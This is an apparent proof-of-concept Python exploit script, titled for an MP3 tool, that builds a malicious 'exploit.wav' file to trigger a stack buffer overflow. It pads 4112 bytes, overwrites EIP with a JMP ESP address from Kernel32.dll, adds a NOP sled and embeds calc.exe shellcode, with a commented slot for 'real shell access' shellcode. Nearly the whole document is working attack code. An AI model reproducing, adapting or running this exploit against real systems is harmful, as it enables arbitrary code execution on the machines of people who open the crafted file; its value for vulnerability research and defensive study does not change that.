SRBTOOL | MP3 Exploit

1. #!/usr/bin/env python
2.  
3.  
4. import struct
5. filename="exploit.wav"
6. fill ="A"*4112
7. #eip = struct.pack('<I',0x42424242) # EIP overwrite verfication
8. eip = struct.pack('<I',0x7C874413) # JMP ESP instruction from Kernel32.dll
9. offset = "\x90"*10
10. available_shellcode_space = 320
11. # Place for calc.exe shellcode
12. calc = ("\xba\x86\x2c\x9a\x7b\xd9\xc2\xd9\x74\x24\xf4\x5e\x33\xc9\xb1"
13. "\x31\x83\xc6\x04\x31\x56\x0f\x03\x56\x89\xce\x6f\x87\x7d\x8c"
14. "\x90\x78\x7d\xf1\x19\x9d\x4c\x31\x7d\xd5\xfe\x81\xf5\xbb\xf2"
15. "\x6a\x5b\x28\x81\x1f\x74\x5f\x22\x95\xa2\x6e\xb3\x86\x97\xf1"
16. "\x37\xd5\xcb\xd1\x06\x16\x1e\x13\x4f\x4b\xd3\x41\x18\x07\x46"
17. "\x76\x2d\x5d\x5b\xfd\x7d\x73\xdb\xe2\x35\x72\xca\xb4\x4e\x2d"
18. "\xcc\x37\x83\x45\x45\x20\xc0\x60\x1f\xdb\x32\x1e\x9e\x0d\x0b"
19. "\xdf\x0d\x70\xa4\x12\x4f\xb4\x02\xcd\x3a\xcc\x71\x70\x3d\x0b"
20. "\x08\xae\xc8\x88\xaa\x25\x6a\x75\x4b\xe9\xed\xfe\x47\x46\x79"
21. "\x58\x4b\x59\xae\xd2\x77\xd2\x51\x35\xfe\xa0\x75\x91\x5b\x72"
22. "\x17\x80\x01\xd5\x28\xd2\xea\x8a\x8c\x98\x06\xde\xbc\xc2\x4c"
23. "\x21\x32\x79\x22\x21\x4c\x82\x12\x4a\x7d\x09\xfd\x0d\x82\xd8"
24. "\xba\xe2\xc8\x41\xea\x6a\x95\x13\xaf\xf6\x26\xce\xf3\x0e\xa5"
25. "\xfb\x8b\xf4\xb5\x89\x8e\xb1\x71\x61\xe2\xaa\x17\x85\x51\xca"
26. "\x3d\xe6\x34\x58\xdd\xc7\xd3\xd8\x44\x18")
27. # Place for actual shellcode
28. shell =()
29. #nop = "\x90"*(available_shellcode_space-len(shell)-len(offset))
30. #exploit = fill + eip + offset + shell + nop
31. exploit = fill + eip + offset + calc #loader for simple proof of concept for shell cdoe
32. #exploit = fill + eip + offset + shell #loader for real shell access
33. open('exploit.wav', 'w').close()
34. writeFile = open (filename, "w")
35. writeFile.write(exploit)
36. writeFile.close()